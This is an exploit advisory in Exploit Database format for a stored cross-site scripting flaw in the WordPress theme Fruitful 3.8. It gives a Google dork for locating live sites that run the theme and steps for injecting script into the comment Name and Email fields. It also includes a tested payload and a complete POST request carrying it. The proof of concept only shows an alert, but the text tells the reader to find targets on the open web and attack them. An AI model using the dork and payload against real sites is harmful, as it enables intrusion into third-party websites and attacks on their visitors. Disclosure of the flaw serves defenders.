Share
# Exploit Title: WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting  
# Dork: intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply"  
# Date: 2020-02-14  
# Category : Webapps  
# Software Link: https://downloads.wordpress.org/theme/fruitful.3.8.zip  
# Vendor Homepage: https://github.com/Fruitfulcode/Fruitful  
# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)  
# Team Members: Behzad Khalifeh , Milad Ranjbar  
# Version: 3.8  
# Tested on: Windows/Linux  
# CVE: N/A  
  
.:: Theme Description ::.  
Fruitful is Free WordPress responsive theme with powerful theme options panel and simple clean front end design.  
  
.:: Proof Of Concept (PoC) ::.  
Step 1 - Find Your Target With above Dork.  
Step 2 - Inject Your Java Script Codes to Name & Email Fields  
Step 3 - Click Post Comment  
  
.:: Tested Payload ::.  
'>"><script>alert(/XSS By UltraSecurity/)</script>  
  
.:: Post Request ::.  
comment=XSS :)&author='>"><script>alert(/Xssed By Ultra Security/)</script>&email='>"><script>alert(/Xssed By Ultra Security/)</script>&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145